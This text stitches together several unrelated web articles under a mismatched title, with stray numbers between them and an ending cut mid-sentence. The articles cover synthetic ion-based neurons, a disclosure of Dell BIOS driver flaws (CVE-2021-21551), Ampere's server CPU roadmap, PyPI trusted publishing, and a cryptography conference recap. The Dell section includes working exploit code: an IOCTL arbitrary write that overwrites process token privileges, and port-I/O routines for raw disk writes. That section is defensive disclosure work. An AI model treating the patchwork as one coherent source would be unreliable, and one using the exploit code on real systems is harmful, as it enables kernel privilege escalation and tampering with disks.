(Image credit: Bruce Rolff/Stocktrek Images via Getty) Scientists have created key parts of synthetic brain cells that can hold cellular "memories" for milliseconds. The achievement could one day lead to computers that work like the human brain. These parts, which were used to model an artificial brain cell, use charged particles called ions to produce an electrical signal, in the same way that information gets transferred between neurons in your brain. Current computers can do incredible things, but this processing power comes at a high energy cost. In contrast, the human brain is remarkably efficient, using roughly the energy contained in two bananas to do an entire day's work. While the reasons for this efficiency aren't entirely clear, scientists have reasoned that if they could make a computer more like the human brain, it would require way less energy. One way that scientists try to replicate the brain's biological machinery is by utilizing the power of ions, the charged particles that the brain relies on to produce electricity . strong Inside the brain: A photo journey through time The researchers' artificial neuron prototype uses nanofluidic slits to mimic ion channels and allow neurons to communicate like they do in the brain.  (Image credit: © Paul Robin, ENS Laboratoire de Physique (CNRS/ENS-PSL/Sorbonne Université/Université de Paris)) In the new study, published in the journal Science on Aug. 6, researchers at the Centre national de la recherche scientifique in Paris, France created a computer model of artificial neurons that could produce the same sort of electrical signals neurons use to transfer information in the brain; by sending ions through thin channels of water to mimic real ion channels, the researchers could produce these electrical spikes. And now, they have even created a physical model incorporating these channels as part of unpublished, ongoing research. "To my knowledge, it's the first time that people [have done] this with ions," said study co-author Lydéric Bocquet, a physicist at the École Normale Supérieure. At a finer level, the researchers created a system that mimics the process of generating action potentials —spikes in electrical activity generated by neurons that are the basis of brain activity. To generate an action potential, a neuron starts to let in more positive ions, which are attracted to the negative ions inside of the cell. The electrical potential, or voltage across the cell membrane, causes doorways on the cell called voltage -gated ion channels to open, raising the charge even more before the cell reaches a peak and returns to normal a few milliseconds later. The signal is then transmitted to other cells, enabling information to travel in the brain. To mimic voltage-gated ion channels, the researchers modeled a thin layer of water between sheets of graphene, which are extremely thin sheets of carbon. The water layers in the simulations were one, two, or three  molecules in depth, which the researchers characterized as a quasi-two-dimension slit. Bocquet said that the researchers wanted to use this two-dimensional environment because particles tend to react much more strongly in two dimensions than in three, and they exhibit different properties in two dimensions, which the researchers thought might be useful for their experiment. "In physics, two dimensions is very weird," said Bocquet. "So you expect new things to occur." Testing out the model in a computer simulation, the researchers found that when they applied an electric field to the channel, the ions in the water formed worm-like structures. As the team applied a greater electric field in the simulation, these structures would break up slowly enough to leave behind a " memory ," or a hint of the elongated configuration. When the researchers ran a simulation linking two channels and other components to mimic the behavior of a neuron, they found the model could generate spikes in electrical activity like action potentials, and that it "remembered" consistent properties in two different states — one where ions conducted more electricity and one where they conducted less. In this simulation, the "memory" of the previous state of the ions lasted a few milliseconds, around the same time as it takes real neurons to produce an action potential and return to a resting state. This is quite a long time for ions, which usually operate on timescales of nanoseconds or less. In a real neuron, an action potential equates to a cellular memory in the neuron; our brains use the opening and closing of ion channels to create this kind of memory. "We have similar memory in the end, but the reason for the phenomenon is very different," Bocquet said. The new model is a version of an electronic component called a memristor, or a memory resistor, which has the unique property of retaining information from its history. But existing memristors don't use liquid, as the brain does. RELATED CONTENT —Sherlock Holmes' famous memory trick really works —See photos of Albert Einstein's brain —From dino brains to thought control — 10 fascinating brain findings "The typical memristors that I work with, and other people in the literature work with, are solid-state memristors," said Gina Adam, an assistant professor of electrical and computer engineering at George Washington University, who was not involved in the study. This new research on creating fluid memristors is "very promising and very intriguing," Adam added. She also said that while practical brain-like computers are likely a long way away, this research could also help scientists better understand how the brain processes information and develop new theories of brain-like computing. Since conducting this research with computer simulations, Bocquet says he and collaborators at the University of Manchester in the U.K. have brought their theory to life, using it to create an artificial synapse, the part of a neuron that passes on electric signals, and they have started performing experiments with it. "It's exciting because it's a playground now," Bocquet said. "We can explore these things actively." Originally published on Live Science.
193
Dell patches 12-year-old driver vulnerability impacting millions of PCs
Security Research CVE-2021-21551- Hundreds Of Millions Of Dell Computers At Risk Due to Multiple BIOS Driver Privilege Escalation Flaws Several months ago, I started investigating the security posture of the firmware update driver version 2.3 (dbutil_2_3.sys) module, which seems to have been in use since at least 2009. Today, the firmware update driver component, which is responsible for Dell Firmware Updates via the Dell Bios Utility, comes pre-installed on most Dell machines running Windows and freshly installed Windows machines that have been updated. Hundreds of millions of Dell devices have updates pushed on a regular basis, for both consumer and enterprise systems. The driver came to my attention thanks to Process Hacker, which has a great feature that pops up a notification message every time a service gets created or deleted: This led to the discovery of five high severity bugs that have remained undisclosed for 12 years. These multiple high severity vulnerabilities in Dell software could allow attackers to escalate privileges from a non-administrator user to kernel mode privileges. Over the years, Dell has released BIOS update utilities which contain the vulnerable driver for hundreds of millions of computers (including desktops, laptops, notebooks, and tablets) worldwide. Dell has assigned one CVE to cover all the flaws in the firmware update driver, but this single CVE can be broken down to the following five separate flaws: In today’s post, I will describe some of the general problems with this driver. However, to enable Dell customers the opportunity to remediate this vulnerability, we are withholding sharing our Proof of Concept until June 1, 2021. That proof of concept will demonstrate the first local EOP which arises out of a memory corruption issue. The first and most immediate problem with the firmware update driver arises out of the fact that it accepts IOCTL (Input/Output Control) requests without any ACL requirements. That means that it can be invoked by a non-privileged user: 2: kd> !devobj ffffae077fb47820Device object (ffffae077fb47820) is for: DBUtil_2_3 Driverdbutil DriverObject ffffae0782dbce30Current Irp 00000000 RefCount 1 Type 00009b0c Flags 00000048SecurityDescriptor ffffd70bdb4f4160 DevExt ffffae077fb47970 DevObjExt ffffae077fb47a10ExtensionFlags (0x00000800)  DOE_DEFAULT_SD_PRESENTCharacteristics (0000000000)Device queue is not busy.2: kd> !sd ffffd70bdb4f4160 0x1[truncated]->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE->Dacl    : ->Ace[0]: ->AceFlags: 0x0->Dacl    : ->Ace[0]: ->AceSize: 0x14->Dacl    : ->Ace[0]: ->Mask : 0x001201bf->Dacl    : ->Ace[0]: ->SID: S-1-1-0 (Well Known Group: localhostEveryone)[truncated] Allowing any process to communicate with your driver is often a bad practice since drivers operate with the highest of privileges; thus, some IOCTL functions can be abused “by design”. The firmware update driver exposes many functions via IRP_MJ_DEVICE_CONTROL. The most obvious bug to exploit gives you an extremely powerful primitive. Via IOCTL 0x9B0C1EC8, it is possible to completely control the arguments passed to memmove, thus, allowing an arbitrary read/write vulnerability: A classic exploitation technique for this vulnerability would be to overwrite the values of Present and Enabled in the Token privilege member inside the EPROCESS of the process whose privileges we want to escalate: 1: kd> dt nt!_SEP_TOKEN_PRIVILEGES   +0x000 Present          : Uint8B   +0x008 Enabled          : Uint8B   +0x010 EnabledByDefault : Uint8B This can be triggered and exploited quite simply: struct ioctl_input_params {uint64_t padding1;uint64_t address;uint64_t padding2;uint64_t value_to_write;};static constexpr uint64_t MASK_TO_WRITE = MAXULONGLONG;DWORD bytesReturned = 0;ioctl_input_params privilege_present_params{ 0 };privilege_present_params.address = presentAddress;privilege_present_params.value_to_write = MASK_TO_WRITE;DeviceIoControl(hDevice, EXPLOITABLE_RW_CONTROL_CODE, &privilege_present_params,sizeof(privilege_present_params), &privilege_present_params, sizeof(privilege_present_params), &bytesReturned, NULL);ioctl_input_params privilege_enabled_params{ 0 };privilege_enabled_params.address = enabledAddress;privilege_enabled_params.value_to_write = MASK_TO_WRITE;DeviceIoControl(hDevice, EXPLOITABLE_RW_CONTROL_CODE, &privilege_enabled_params,sizeof(privilege_enabled_params), &privilege_enabled_params, sizeof(privilege_enabled_params), &bytesReturned, NULL); Another interesting vulnerability in this driver is one that makes it possible to run I/O (IN/OUT) instructions in kernel mode with arbitrary operands (LPE #3 and LPE #4). This is less trivial to exploit and might require using various creative techniques to achieve elevation of privileges. Since IOPL (I/O privilege level) equals to CPL (current privilege level), it is obviously possible to interact with peripheral devices such as the HDD and GPU to either read/write directly to the disk or invoke DMA operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process. The following code illustrates direct read/write using ATA port IO and shows how to invoke those IOCTLs (IN/OUT wrappers are abstracted): void port_byte_out(unsigned short port, unsigned char payload) {unsigned char data[16] = { 0 };*((unsigned long *)((unsigned char *)data)) = port;*((unsigned char *)((unsigned char *)data + 4)) = payload;bResult = DeviceIoControl(hDevice, IOCTL_BYTE_OUT, data, sizeof(data), data, sizeof(data), &junk, NULL);if (!bResult) {printf("error in port_byte_out: %xrn", GetLastError());}}unsigned char port_byte_in(unsigned short port) {unsigned char data[16] = { 0 };*((unsigned long *)((unsigned char *)data)) = port;bResult = DeviceIoControl(hDevice, IOCTL_BYTE_IN, data, sizeof(data), data, sizeof(data), &junk, NULL);if (!bResult) {printf("error in port_byte_in: %xrn", GetLastError());}return data[0];} Writing directly to the HDD without creating an IRP for that disk write basically bypasses all security mechanisms in the operating system and allows an attacker to write to any sector on the disk. For example, here is code from the LearnOS repository that takes advantage of IN/OUT instructions for direct HDD writing: void write_sectors_ATA_PIO(uint32_t LBA, uint8_t sector_count, uint32_t* bytes) {ATA_wait_BSY();port_byte_out(0x1F6,0xE0 | ((LBA >>24) & 0xF));port_byte_out(0x1F2,sector_count);port_byte_out(0x1F3, (uint8_t) LBA);port_byte_out(0x1F4, (uint8_t)(LBA >> 8));port_byte_out(0x1F5, (uint8_t)(LBA >> 16)); port_byte_out(0x1F7,0x30); //Send the write commandfor (int j =0;j Interestingly, unrelated to the IOCTL handler bugs, the driver file itself is located in C:WindowsTemp, which is also a bug itself and opens the door to other issues. The classic way to exploit this would be to transform any BYOVD (Bring Your Own Vulnerable Driver) into an Elevation of Privileges vulnerability since loading a (vulnerable) driver means you require administrator privileges, which essentially eliminates the need for a vulnerability. Thus, using this side noted vulnerability virtually means you can take any BYOVD to an Elevation of Privileges. Here you can see a proof-of-concept to demonstrate the first LPE due to memory corruption: The high severity flaws could allow any user on the computer, even without privileges, to escalate their privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products. An attacker with access to an organization’s network may also gain access to execute code on unpatched Dell systems and use this vulnerability to gain local elevation of privilege. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement. This vulnerability and its remedies are described in Dell Security Advisory DSA-2021-088. We recommend Dell customers, both enterprise and consumer, to apply the patch as soon as possible. While Dell is releasing a patch (a fixed driver), note that the certificate was not yet revoked (at the time of writing). This is not considered best practice since the vulnerable driver can still be used in a BYOVD attack as mentioned earlier. Please see the Dell Security Advisory for complete remediation details. These high severity vulnerabilities, which have been present in Dell devices since 2009, affect hundreds of millions of devices and millions of users worldwide. Similar to a previous vulnerability I disclosed that hid for 12 years, the impact this could have on users and enterprises that fail to patch is far reaching and significant. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, with hundreds of million of enterprises and users currently vulnerable, it is inevitable that attackers will seek out those that do not take the appropriate action. Our reason for publishing this research is to not only help our customers but also the community to understand the risk and to take action. We would like to thank Dell for their approach to our disclosure and for remediating the vulnerabilities. 1, Dec, 2020 – Initial report 2, Dec, 2020 – Dell replied with ticket numbers 8, Dec, 2020 – Dell requested more information 9, Dec, 2020 – Dell request additional information 22, Dec, 2020 – Dell replied that a fix should be available in mid April 12, Jan, 2021 – Dell replied that some of the vulnerabilities will not be fixed since the product is EOL 27, Jan, 2021 – Dell requested more time 16, Mar, 2021 – Dell updated that they are cooperating with Microsoft and a fix should be available by the end of April 29, Mar, 2021 – Dell requested more time, confirmed that an update should be available by the end of April 22, Apr, 2021 – Dell initiated a zoom conference call to discuss the blog post release 04, May, 2021 – Initial research released to the public
2
Ampere Roadmap Update: Switching to In-House CPU Designs, 128 5nm Cores in 2022
Today we’re covering some news of the more unusual type, and that is a roadmap update from Ampere, and having a closer look what the company is planning in terms of architectural and microarchitectural choices of their upcoming next-generation server CPUs in 2022 and onwards. For people not familiar with Ampere, the company was founded back in 2017 by former Intel president Renée James, notably built upon a group of former Intel engineers who had left along with her to the new adventure. Initially, the company had relied on IP and design talent from former AppliedMicro’s X-Gene CPUs and still supporting legacy products such as the eMAG line-up. With Arm having starting a more emphasised focus on designing and releasing datacentre and enterprise CPU IP line-ups in the form of the new Neoverse core offerings a few years back, over the last year or so we had finally seen the fruits of these efforts in the form of the release of several implementations of the first generation Neoverse N1 server CPU cores products, such as Amazon’s Graviton2, and more importantly, Ampere’s “Altra Quicksilver” 80-core server CPU. The Altra Q line-up, for which we reviewed the flagship Q80-33 SKU last winter, was inarguably one of the most impressive Arm server CPU executions in past years, with the chip being able to keep up or beat the best AMD and Intel had to offer, even extending that positioning against the latest generation Xeon and EPYC generation. Ampere’s next generation "Mystique" Altra Max is the next product on the roadmap, and is targeted to be sampling in the next few months and released later this year. The design relies on the same first generation Arm Neoverse N1 cores, at the same maximum 250W TDP as a drop-in replacement on the same platform, however with an optimised implementation that now allows for up to 128 CPU cores – 60% more cores than the first iteration of Altra we have today, and double the amount of cores of competitor systems from AMD or Amazon’s Graviton2. For the future for designs beyond the Altra Max, Ampere is promising that they will be continuing emphasis of what they consider “predictable performance” for workloads with scaling socket load, increasing core counts with a linear increase in performance, and what I found interesting as a metric, to continue to reduce power per core – something to keep in mind as we’re discussing the next big news today: Today’s big reveal comes in regard to the microarchitecture choices that Ampere is going to be using starting in their next generation 2022 “Siryn” design, successor to the Altra Max, and relates to the CPU IP being used: Starting with Siryn, Ampere will be switching over from Arm’s Neoverse cores to their new in-house full custom CPU microarchitecture. This announcement admittedly caught us completely off-guard, as we had largely expected Ampere to continue to be using Arm’s Neoverse cores for the foreseeable future. The switch to a new full custom microarchitecture puts Ampere on a completely different trajectory than we had initially expected from the company. In fact, Ampere explains that what the move towards a full custom microarchitecture core design was actually always the plan for the company since its inception, and their custom CPU design had been in the works for the past 3+ years. In terms of background - the design team leading the effort is lead by Ampere’s CTO Atiq Bajwa, who is also acting as the chief architect on the project. Bajwa and the team surrounding him appear to be mostly comprised of high-profile ex-Intel engineers and veterans which had left the company along with Renée James in 2017, topped-off with talent from a slew of other companies in the industry who joined them in the effort. The pedigree and history of the team is marked by achievements such as working on Intel’s Haswell and Broadwell processors. Ampere’s explanation and rationale for designing a full custom core from the ground up, is that they are claiming they are able to achieve better performance and better power efficiency in datacentre workloads compared to what Arm’s Neoverse “more general purpose” designs are able to achieve. This is quite an interesting claim to make, and contrasts Arm’s projections and goals for their Neoverse cores. The recent Neoverse V1 and N2 cores were unveiled in more detail last month and are claimed to achieve significant generational IPC gains. For Ampere to relinquish the reliance on Arm’s next-gen cores, and instead to rely on their own design and actually go forward with that switch in the next-gen product, shows a sign of great confidence in their custom microarchitecture design – and at the same time one could interpret it as a sign of no confidence in Arm’s Neoverse IP and roadmap. This comes at a great juxtaposition to what others are doing in the industry: Marvell has stopped development of their own ThunderX CPU IP in favour of adopting Arm Neoverse cores. On the other hand, not specifically related to the cloud and server market, Qualcomm earlier this year have acquired Nuvia, and their rationale and explanation was similar to Ampere’s in that they’re claiming that the new in-house design capabilities offered performance that otherwise wouldn’t have been possible with Arm’s Cortex CPU IP. In our talks with Jeff Wittich, Ampere’s Chief Product Officer, he explains that today’s announcement should hopefully help paint a better picture of where Ampere is heading as a company – whether they’d continue to be content on “just” being an Arm IP integrator, or if they had plans for more. Jeff was pretty clear that in a few years’ time they’re envisioning and aiming for Ampere to be a top CPU provider for the cloud market and major player in the industry. In terms of technical details as to how Ampere’s CPU microarchitecture will be different in terms of approach and how and why they see it as a superior performer in the cloud, are questions to which we’ll have to be a bit more patient for hearing answers to. The company wouldn’t comment on the exact status of the Siryn design right now – on whether it’s been taped in or taped out yet, but they do retierate that they’re planning customer sampling in early 2022 in accordance to prior roadmap disclosures. By the tone of the discussions, it seems the design is mostly complete, and Ampere is doing the finishing touches on the whole SoC. Jeff mentioned that in due time, they also will be doing microarchitectural disclosures on the new core, explaining their design choices in things like front-end or back-end design, and why they see it as a better fit for the cloud market. Beyond the longer-term >2022 plans, today’s roadmap updates also contained a few more performance claim reiterations of Ampere’s upcoming 128-core Altra Max product, which is planned to hit the market later in the second half of the year and customers being sampled in the next few months. The “Mystique” code-named Altra Max design will be characterised in that it’s able to increase the core-count by 60% versus the current generation Altra design, all while remaining at and below the same 250W TDP. The performance slides here are showcasing comparisons and performance claims against what is by now the previous generation competitor products, Ampere here simply explains they haven’t been able to get their hands on more recent Milan or Ice Lake-SP hardware to test. Nevertheless, the relative positioning against the Altra Q80-30 and the EPYC 7742 would indicate that the new chip would easily surpass the performance of even AMD’s latest EPYC 7763. In the slide, Ampere actually discloses the SKU model name being used for the comparison, which is the "Altra Max M128-30" – meaning for the first time we have confirmation that all 128 cores are running at up to 3GHz clock speed, which is impressive given that we’re supposed to be seeing the same TDP and power characteristics between it and the Q80-33. We’ll be verifying these figures in the next few months once we get to review the Altra Max. Today’s announcement also comes with an update on Ampere’s customers. Oracle was notably one of the first Altra adopters, but today’s disclosure also includes a wider range of cloud providers, with big names such as ByteDance and Tencent Cloud, two of the biggest hyperscalers in China. Microsoft in particular is a big addition to the customer list, and while Ampere’s Jeff Wittich couldn’t comment on whether Microsoft has other internal plans in the works, he said that today’s announcement should give more clarity around the rumours of the Redmond company working on Arm-based servers, reports of which had surfaced back in December. Microsoft’s Azure cloud service is only second to Amazon’s AWS in terms of size and scale, and the company onboarding Altra products is a massive win for Ampere. Today’s announcements by Ampere of them deploying their own microarchitecture in future products is a major change in the company’s prospects. The news admittedly took us by surprise, but in the grand scheme of things it makes a lot of sense given that the company aims to be a major industry player in the next few years – taking full control of one’s own product future is critical in terms of assuring that success. While over the years we’ve seen many CPU design teams be disbanded, actually having a new player and microarchitecture pop up is a much welcome change to the industry. While the news is a blow to Arm’s Neoverse IP, the fact that Ampere continues to use the Arm architecture is a further encouragement and win for the Arm ecosystem.
1
Write Rust lints without forking Clippy
Read the official announcement on the PyPI blog as well! For the past year, we’ve worked with the Python Package Index to add a new, more secure authentication method called “trusted publishing.” Trusted publishing eliminates the need for long-lived API tokens and passwords, reducing the risk of supply chain attacks and credential leaks while also streamlining release workflows. Critical packages on PyPI are already using trusted publishing to make their release processes more secure. If you publish packages to PyPI, use the official PyPI documentation to set up trusted publishing for your projects today. The rest of this post will introduce the technical how and why of trusted publishing, as well as where we’d like to see similar techniques applied in the future. We love to help expand trust in language ecosystems. Contact us if you’re involved in a packaging ecosystem (e.g., NPM, Go, Crates, etc) and want to adopt more of these techniques! Trusted publishing: a primer At its core, trusted publishing is “just” another authentication mechanism. In that sense, it’s no different from passwords or long-lived API tokens: you present some kind of proof to the index that states your identity and expected privileges; the index verifies that proof and, if valid, allows you to perform the action associated with those privileges. What makes trusted publishing interesting is how it achieves that authentication without requiring a preexisting shared secret. Let’s get into it! OpenID Connect and “ambient” credentials Trusted publishing is built on top of OpenID Connect (OIDC), an open identity attestation and verification standard built on top of OAuth2. OIDC enables identity providers (IdPs) to produce publicly verifiable credentials that attest to a particular identity (like hamilcar@example.com) . These credentials are JSON Web Tokens (JWTs) under the hood, meaning that an identity under OIDC is the set of relevant claims in the JWT. To drive that point home, here’s what a (slightly redacted) claim set might look like for a user identity presented by GitHub’s OIDC IdP: (In an actual JWT, this claim set would be accompanied by a digital signature proving its authenticity for a trusted signing key held by the IdP. Without that digital signature, we’d have no reason to trust the claims!) Anybody can be an IdP in an OpenID Connect scheme. Still, a large part of the practical value of OIDC is derived from interactions with large, presumed-to-be-trustworthy-and-well-secured IdPs. There’s value in proving ownership over things like GitHub and Google accounts, particularly for things like SSO and service federation. So far, so good, but none of this is especially relevant to packaging indices like PyPI. PyPI could allow users to sign in with OIDC rather than passwords, but it’s unclear how that would make publishing workflows, particularly CI-based ones, any more convenient. What makes OIDC useful to package indices like PyPI is the observation that an OIDC identity doesn’t need to be a human: it can be a machine identifier, a source repository, or even a specific instance of a CI run. Moreover, it doesn’t need to be obtained through an interactive OAuth2 flow: it can be offered “ambiently” as an object or resource that only the identity (machine, etc.) can access. CI providers figured this out not too long ago: GitHub Actions added support for ambient OIDC credentials in late 2021, while GitLab added it just a few months ago. Here’s what retrieving one of those credentials looks like on GitHub Actions: And here’s what the (again, filtered) claim set for a GitHub Actions workflow run might look like: This is a lot of context to work with: assuming that we trust the IdP and that the signature checks out, we can verify the identity down to the exact GitHub repository, the workflow that ran, the user that triggered the workflow, and so forth. Each of these can, in turn, become a constraint in an authentication system. Trust is everything To recap: OpenID Connect gives us the context and machinery we need to verify proofs of identity (in the form of OIDC tokens) originating from an IdP. The identities in these proofs can be anything, including the identity of a GitHub Actions workflow in a particular repository. Any third-party service (like PyPI) can, in turn, accept OIDC tokens and determine a set of permissions based on them. Because OIDC tokens are cryptographically tied to a particular OIDC IdP’s public key, an attacker cannot spoof an OIDC token, even if they know the claims within it. But wait a second: how do we get from an OIDC token containing an identity to a specific PyPI project? How do we know which PyPI project(s) should trust which OIDC identity or identities? This is where a bit of trusted setup is required: a user (on PyPI) has to log in and configure the trust relationship between each project and the publishers (i.e., the OIDC identities) that are authorized to publish on behalf of the project. This needs to be done only once, as with a normal API token. Unlike an API token, however, it only involves one party: the CI (and OIDC) provider doesn’t need to be given a token or any other secret material. Moreover, even the trusted setup part is composed of completely public information: it’s just the set of claim values that the user considers trustworthy for publishing purposes. For GitHub Actions publishing to PyPI, the trusted setup would include the following: The GitHub user/repo slug The filename of the GitHub Actions workflow that’s doing the publishing (e.g., release.yml) Optionally, the name of a GitHub Actions environment that the workflow uses (e.g., release) Together, these states allow the relying party (e.g., PyPI) to accept OIDC tokens, confirm that they’re signed by a trusted identity provider (e.g., GitHub Actions), and then match the signed claims against one or more PyPI projects that have established trust in those claims. Look ma, no secrets! At this point, we have everything we need to allow an identity verified via OIDC to publish to PyPI. Here’s what that looks like in the GitHub case: A developer (or automation) triggers a GitHub Actions workflow to release to PyPI. The normal build process (python -m build or similar) commences. Automation retrieves an OIDC token for the current workflow run, attesting to the current workflow’s identity (user/repo, workflow name, environment, etc.) via GitHub Actions’ OIDC IdP. That OIDC token is shot over to PyPI. If valid, PyPI verifies it and exchanges it for a short-lived PyPI API token that’s scoped to just the PyPI projects that trust those token claims. PyPI returns the short-lived API token as a response to the OIDC token. The workflow continues, performing a normal PyPI publish step (e.g., with twine) with the short-lived API token. For 99% of package publishers, steps 3 through 7 are entirely implementation details: the official PyPA GitHub Action for publishing to PyPI encapsulates them, making the user-facing piece just this: Why should I care? At this point, you might reasonably think: I’m a competent engineer, and I already do everything right. My tokens are correctly scoped to the smallest permissions required, they’re stored as workflow (or per-environment) secrets, and I carefully audit my release workflows to ensure that all third-party code is trustworthy.” – You, a competent engineer Here’s the thing: you’ve been doing everything right! Until now, the most secure way to authenticate to PyPI was to do the following: Create a project-scoped API token. Store it as a (scoped) secret in your CI. Access it carefully in a publishing workflow you’ve reviewed and established trust in. This suffices for many use cases but also leaves a great deal to be desired from both the usability and security perspectives: Usability. Manually managing and creating API tokens is tedious, especially in scenarios where a single source repository hosts multiple PyPI packages: each needs its own separately scoped token, a unique secret name, and so forth. You and your fellow engineers have better ways to spend your time! Pre-compromise security. Not all attackers are born equal: some are passive, some are active, some might be able to compromise only a specific step in your publishing process, and so forth. Reducing the power of (or outright eliminating) one of these attackers is useful, even when the mitigation involved doesn’t meaningfully impact other attackers. Unfortunately, doing so with long-lived tokens is difficult: a long-lived token is equally susceptible to any attacker who gets access for any time. Post-compromise recovery. Designing for security means attempting to thwart attackers and preparing for and mitigating the risk posed by a successful attacker. With long-lived credentials (either passwords or API tokens), this is slow, tedious, and error-prone: missing a single credential leaves a gap for the attacker to return. A better system wouldn’t have this problem to begin with. Trusted publishing addresses these problems and more: Usability. With a trusted publisher, no manual API token management is necessary: configuring the publisher is a one-time action for each project, including for projects that haven’t been created yet. This avoids the annoying API token dance involved when publishing a brand new project and the game of “credential hot potato” that engineers play when trying to hand an API token to the party responsible for adding it to the CI’s secrets. No more Slack DMs with API tokens! Pre-compromise security. Trusted publishing reduces the number of adversaries: an attacker with access to only some GitHub Actions environments or particular (non-permission) steps can’t mint the OIDC credential needed to use the trusted publisher. This is in marked contrast to a long-lived token stored in a GitHub Actions secret, where any step (and frequently any environment) can access the credential! Post-compromise recovery. Trusted publishing is fundamentally ephemeral: the credentials involved (both the OIDC and PyPI credentials) live for only a few minutes at a time, meaning that an attacker who loses access during post-compromise response is automatically sealed off without any human intervention. That means fewer manual steps and fewer possible human errors. Security and threat model considerations Trusted publishing is another way to securely authenticate to a package index. Like every security feature, it must be designed and implemented to a threat model. That threat model must justify trusted publishing’s existence, both for addressing attackers that previous authentication methods do not address and for new attack scenarios it exposes. Existing threats: account takeover and supply chain attacks Account takeover (ATO) is a known problem in packaging ecosystems: an attacker who manages to compromise a legitimate user’s PyPI or GitHub account can upload malicious releases (or even override previous ones) without any outward indication of inauthenticity. In the general case, ATO is an unsolvable problem: services like PyPI and GitHub can improve access to security features (and even mandate those features) but fundamentally cannot prevent a user from disclosing their credentials (e.g., via phishing), much less protect them from every piece of potentially vulnerable software they use. At the same time, features like trusted publishing can reduce the scope of account takeover: a future in which package indices allow packages to opt in to only trusted publishing is one where an ATO on the package index itself doesn’t allow the attacker to upload malicious releases. Similarly, “supply chain security” is all the rage these days: companies and hobbyists alike are taking a second look at out-of-control dependency trees and their frequently unaccountable and untraceable components. Without trusted publishing, the status quo for GitHub Actions is that you trust every third-party action you execute: they can all read your configured secrets. This is extremely non-ideal and is one of the key attack models trusted publishing intends to secure against. New threats: “account resurrection” and malicious committers Trusted publishing works because it’s tied to a notion of “trusted identity”: the trusted identity on the other side (e.g., on GitHub Actions) is a tuple of user/repo, workflow name, and an optional environment name. But wait: what happens if a user changes their username and an attacker takes over their old username? We call this “account resurrection,” and it’s explicitly supported by most services: a username isn’t intended to be a permanent, stable identifier for the underlying identity. This opens up an entirely new attack vector: a PyPI project that trusts hamilcar/cartago might suddenly begin trusting an attacker-controlled hamilcar/cartago, all because the original hamilcar is now hannibal (and the legitimate hamilcar/cartago is now hannibal/cartago). We thought of this while designing trusted publishing for PyPI and worked with GitHub to add an additional claim that binds the OIDC token not just to the strong, but also to their unique, stable user ID. This gives us the state we need to prevent resurrection attacks: even if an attacker manages to become hamilcar on GitHub, their underlying user ID will not change and PyPI will reject any identity tokens they present. Trusted publishing also reveals a new (potential) division in a project’s trust model: for any given project, do you trust every member of that project to also be a potential publisher? In many cases, the answer is yes: many projects have only one or two repository members, both of whom are also owners or otherwise privileged on the package index. In some cases, however, the answer is no: many projects have dozens of low-activity or inactive members, not all of whom may be following best practices for securing their accounts. These members might not be removable because of community policy or because they need access for infrequent (but critical) project activities. These users should not necessarily receive the ability to publish releases to the packaging index just because they have the commit bit on the repository. This is also a consideration we made while designing trusted publishing, and it’s why PyPI’s implementation supports an optional GitHub Actions environment: for communities where users who commit and users who publish do not wholly overlap, an environment can be used to impose additional workflow restrictions that are reflected (and subsequently honored by PyPI) in the OIDC token. A detailed example of this is given in PyPI’s own security model documentation. Coming to a package index near you Our work on PyPI was funded by the incredible Google Open Source Security Team (GOSST), who we’ve also worked with to develop new tooling for the Python ecosystem’s overall security. In particular, we’d like to thank Dustin Ingram for tirelessly working alongside us and directing the overall pace and design of trusted publishing for PyPI. At the moment, PyPI is the only package index offering trusted publishing that we’re aware of. That being said, nothing about trusted publishing is unique to Python or Python packaging: it could just as easily be adopted by Rust’s Crates, Ruby’s RubyGems, JavaScript’s NPM, or any other ecosystem where publishing from a third-party service is common (like GitHub Actions or GitLab’s CI/CD). It’s our opinion that, much like Two-Factor Authentication in 2019, this kind of trusted publishing scheme will become instrumental to the security model of open-source packaging. We see it as a building block for all kinds of subsequent improvements, including being able to generate strong cryptographic proof that a PyPI release was built from a particular source artifact. If you or your company are interested in this work, please get in touch with us! We have years of experience working on security features in open-source ecosystems and are always looking for more ways to contribute to critical open-source projects and services. Last month, hundreds of cryptographers descended upon Tokyo for the first Real World Crypto Conference in Asia. As in previous years, we dispatched a handful of our researchers and engineers to present and attend the conference. What sets RWC apart from other conferences is that it strongly emphasizes research, collaborations, and advancements in cryptography that affect real-world systems. This year, we happened to notice a couple items that we’ll highlight. First, many talks detailed the painstaking process that is secure cryptographic protocol development. Second, PQC is on the rise and is steadlily advancing from theory into practice. Lastly, sometimes the most interesting cryptographic flaws aren’t even cryptographic flaws: bad RNGs and multi-threading can just as easily break your cryptography. Our EDHOC presentation strong (paper, video, slides) about his research analyzing the security of the Ephemeral Diffie-Hellman Over COSE (EDHOC) protocol. EDHOC is a lightweight key exchange protocol similar to TLS but more compact. In collaboration with other researchers, Marc’s work verified multiple security properties of the EDHOC protocol and even identified theoretical security issues that led to updates made to the EDHOC standard. The talk highlighted how the LAKE working group openly called the community to analyze EDHOC and benefited from many insights, making the protocol safer and better overall. With high-assurance cryptography on the rise, more tools are available to assist with this task. For instance, strong (paper, slides, video) paves the way for high assurance standards for cryptography. It provides tools to specify cryptographic specifications that can further be formally verified. Invite your friends and adversaries to your protocol party! Our talk echoed a common theme at the conference, encouraging people to collaborate with researchers and stakeholders to analyze crypto and protocols instead of rolling their own. Many cryptographic protocols, such as End-to-End-Encryption (E2EE) messengers, have been broken in recent years with varying levels of impact. Notable examples include Telegram in 2022, Bridgefy, and Threema (paper, slides, video). These examples have something in common: missing formal analysis. The lesson is that Telegram, Bridgefy, and Threema should not have rolled out their crypto! But to be fair, deployment of a new and ad-hoc protocol is hardly uncommon. The first formal analysis of the highly acclaimed Signal protocol came after the Signal app was already deployed. Even then, further analysis was needed to capture other security aspects. On its own, the phrase “Don’t roll your crypto” isn’t helpful. Someone has to roll some crypto at some point. The case of Threema shows that an application that uses all the right cryptographic primitives can still be broken. One lesson from the EE2E messaging world is that, perhaps, it doesn’t matter who rolled what. What’s important is the analysis that was performed against the protocol. Formal analysis and good old cryptanalysis of a protocol are necessary to get confidence in a new protocol. Don’t roll your protocol alone! Use all the tools available to you. If you are unfamiliar with one of these tools, use the army of friends willing to apply these tools against your protocol. If you’d like to learn more about how to analyze these protocols and the tools available, book a call to discuss with one of our cryptographers. Our doors are always open! Post-quantum cryptography is steadily advancing NIST announced the post-quantum 